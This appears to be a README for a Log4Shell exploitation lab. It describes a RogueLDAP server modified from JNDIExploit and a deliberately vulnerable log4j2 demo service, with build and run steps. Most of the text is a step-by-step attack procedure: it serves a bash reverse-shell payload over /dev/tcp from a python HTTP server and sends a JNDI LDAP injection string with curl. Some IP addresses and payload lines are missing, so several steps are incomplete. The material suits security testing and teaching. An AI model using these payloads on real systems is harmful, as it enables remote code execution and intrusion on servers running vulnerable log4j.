This is a lightweight RogueLDAP
server which is a modified version of the JNDIExploit-1.
git clone
In order to build the RogueLDAP
server run the following commands
cd RogueLDAP/RogueLDAP
mvn clean package
The logging-log4j2
is a vulnerable dummy web service which only logs a user supplied string value. This application created for testing purposes in order to test the Log4Shell
vulnerability using the RogueLDAP
From cli run the following commands to build the logging-log4j2
cd RogueLDAP/logging-log4j2
mvn clean install
docker build -f Dockerfile -t logging-log4j2-vuln .
cd RogueLDAP/logging-log4j2
mvn clean package
In order to setup the environment and run the exploit the following steps should be followed
- Open a new terminal window and run the
server at the attacking machine
cd RogueLDAP/RogueLDAP/target
java -jar RogueLDAP-1.4-SNAPSHOT.jar -i <YOUR-IP-ADDRESS>
- Open a new terminal window and run the vulnerable
application at the target machine
docker run -p 8080:8080 logging-log4j2-vuln
cd RogueLDAP/RogueLDAP/target
java -Dlog4j2.contextSelector=org.apache.logging.log4j.core.async.AsyncLoggerContextSelector -jar logging-log4j2-1.0.jar
- create a folder called
at a preffered location at the attacking machine
mkdir shells
cd shells
- Inside the
folder create anindex.html
touch index.html
- Inside the
file put the following payload and change the IP address to the one that suits to your environment
/bin/bash -c "/bin/bash -i >& /dev/tcp/ 0>&1" &
- convert the payload
in base64 format as seen below (change the IP address with the one that suits to your environment)
- In order to perform a JNDI LDAP query the following payload will be used (change the IP address with the one that suits to your environment)
- Now open a new terminal window and inside the shells directory run the following command in order to start a python simple HTTP server
cd shells
python3 -m http.server 8085
- Now that the
application runs, open a new terminal window and run thecurl
command line tool in order to send the jndi payload as shown below (change the IP address with the one that suits to your environment)
curl -s -X POST -H "Content-type:application/json" -d "{\"vuln\":\"\${jndi:ldap://}\"}"
The full log4shell exploitation can be seen below